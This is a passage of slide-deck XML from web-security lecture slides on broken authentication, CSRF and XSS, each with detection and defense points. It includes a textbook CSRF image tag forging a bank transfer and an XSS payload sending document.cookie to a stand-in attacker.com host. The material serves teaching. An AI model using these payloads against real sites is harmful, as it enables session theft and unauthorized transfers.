            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Session id is included in URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>No timeout on session</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Passwords are not properly hashed. </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Passwords are used as a sole factor.</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8"/>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Broken Authentication and Session Management</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Google Shape;309;p58"/>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Detection:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Credentials are stored or transmitted in clear text.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Credentials can be easily guessed or overwritten.  </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Session IDs are exposed in the URL, don’t time out or easily guessed. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Defense:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Strong control such as ensure to meet all requirements defined in OWASP’s Application Security Verification Standard (ASVS) areas V2 (Authentication) and V3 (Session Management).</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/images/6/67/OWASPApplicationSecurityVerificationStandard3.0.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>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9"/>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Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;315;p59"/>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Attacker tricks a logged-on victim’s browser to send a forged HTTP requests that include the victim’s session cookie or other authentication info to a vulnerable web application, which thinks the request is legitimate from the victim.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The victim logged into the vulnerable site (e.g. examplebank.com) and got authenticated</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Victim then visits the attacker site, and clicked on a image with the following iframe embedded:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;img  src="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://examplebank.com/app/transferFunds?amount=1500</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>&amp;destinationAcct=attackersAcct#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>" width=0 height=0/&gt;</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0"/>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Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Google Shape;321;p60"/>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Detection:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Both manual and automatic methods</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Focus on the links and forms that invoke state-changing functions. Check if they lack of unpredictable CSRF tokens.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Defense:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Include an unpredictable unique token (per user session) in each HTTP request. This unique token is preferably included in a hidden field. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Require the user to reauthenticate, or prove they are a user (e.g., via a CAPTCHA) can also protect against CSRF.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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1"/>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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Google Shape;327;p61"/>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Attacker sends text-based attack scripts that exploit the interpreter in the browser in which all user supplied input may not be properly escaped and validated.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>(String) page +="&lt;input name ='creditcard' type='TEXT' value='"+request.getParameter("CC")+"'&gt;";</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>"CC" as '&gt;&lt;script&gt;document.location='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.attacker.com/cgi-bin/cookie.cgi?foo=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>' +document.cookie&lt;/script&gt;'</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A good explanation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://excess-xss.com/</a:t>
            </a:r>
            <a:endParaRPr/>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2"/>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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Google Shape;333;p62"/>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Detection:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Combination of manual code review/pen testing and automated tools.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Need be interpreter specific: Javascript, ActiveX, Flash, Silverlight etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Defense:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Properly escape and validate all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use auto-sanitization libraries like OWASP’s AntiSamy or the Java HTML Sanitizer Project.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Enable CSP (Content Security Policy)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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3"/>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339" name="Google Shape;339;p63"/>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4"/>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4"/>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The following Slides are from the seed project. authored by Prof Wenliang Du.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.handsonsecurity.net/questions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr sz="28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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4175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 sz="2400"/>
              <a:t>Cross-Site Requests and Its Problems</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="351" name="Google Shape;351;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1170125"/>
            <a:ext cx="4514125" cy="3028551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4742400" y="990225"/>
            <a:ext cx="4089900" cy="3954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When a page from a website sends an HTTP request back to the website, it is called same-site request.</a:t>
            </a:r>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If a request is sent to a different website, it is called cross-site request because  where the page comes from and where the request goes are different.</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Eg : A webpage (not Facebook) can include a Facebook link, so when users click on the link, HTTP request is sent to Facebook.</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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4198675"/>
            <a:ext cx="44337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It is possible for third-party websites to forge requests that are exactly the same as the same-site requests. This is called Cross-Site Request Forgery (CSRF).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0"/>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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p30"/>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WWW (World Wide Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>URL (Uniform Resource Locator): an address to any resource on network</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It is one type of URI (uniform Resource Identifier)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>General</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>URI format:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> scheme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>:[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>user:password@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>:port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>]][</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
